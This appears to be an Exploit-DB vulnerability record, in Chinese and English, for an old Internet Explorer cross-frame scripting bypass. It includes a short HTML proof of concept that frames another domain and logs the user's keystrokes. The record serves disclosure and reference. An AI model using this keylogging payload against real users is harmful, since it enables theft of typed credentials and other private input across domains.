https://www.exploit-db.com/exploits/23766
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-571

MicrosoftInternetExplorer是一款流行的WEB浏览器。MicrosoftInternetExplorer存在一个访问验证错误，远程攻击者可以利用这个漏洞可绕过跨帧脚本限制，盲目的’受信’的执行恶意脚本。问题是由于IE事件处理函数中的不充分限制。根据MicrosoftKnowledgeBaseArticle167796(http://support.microsoft.com/support/kb/articles/Q167/7/96.asp)，在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义，可绕过帧访问限制。攻击者可以诱骗用户连接包含恶意帧的页面来利用这个漏洞。获得敏感信息，或者受信情况下访问伪造页面。

source: http://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>

来源:XF
名称:ie-frame-domain-bypass(15337)
链接:http://xforce.iss.net/xforce/xfdb/15337
来源:BID
名称:9761
链接:http://www.securityfocus.com/bid/9761
来源:IDEFENSE
名称:20040227MicrosoftInternetExplorerCrossFrameScriptingRestrictionBypass
链接:http://www.idefense.com/application/poi/display?id=77&type;=vulnerabilities&flashstatus;=false
来源：NSFOCUS
名称：6101
链接：http://www.nsfocus.net/vulndb/6101